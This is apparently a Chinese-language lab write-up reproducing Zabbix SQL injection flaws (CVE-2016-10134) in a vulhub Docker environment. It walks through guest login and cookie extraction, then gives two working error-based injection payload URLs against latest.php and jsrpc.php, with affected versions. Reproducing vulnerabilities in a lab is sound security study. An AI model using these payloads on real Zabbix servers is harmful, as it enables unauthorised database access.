环境搭建好才发现vulhub上已经有了,这里还是使用vulhub进行漏洞复现,自己搭建环境的话需要开启guest
访问权限
Zabbix SQL(latest.php) 注入漏洞(CVE-2016-10134)
启动环境
docker-compose up -d
漏洞复现
访问http://ip:8080
,用账号guest
(密码为空)登录游客账户
登录后,查看Cookie中的zbx_sessionid
,复制后16位字符
payload:zabbix/latest.php?output=ajax&sid=caeaeefde7aafed5&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
Zabbix SQL(jsrpc.php) 注入漏洞
漏洞产生原因:profileIdx2
参数没有被过滤
利用条件:guest
用户开启,允许访问
影响版本:2.0.x
| 2.2.x
| 2.4.x
| 3.0.0-3.0.3
payload:zabbix/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)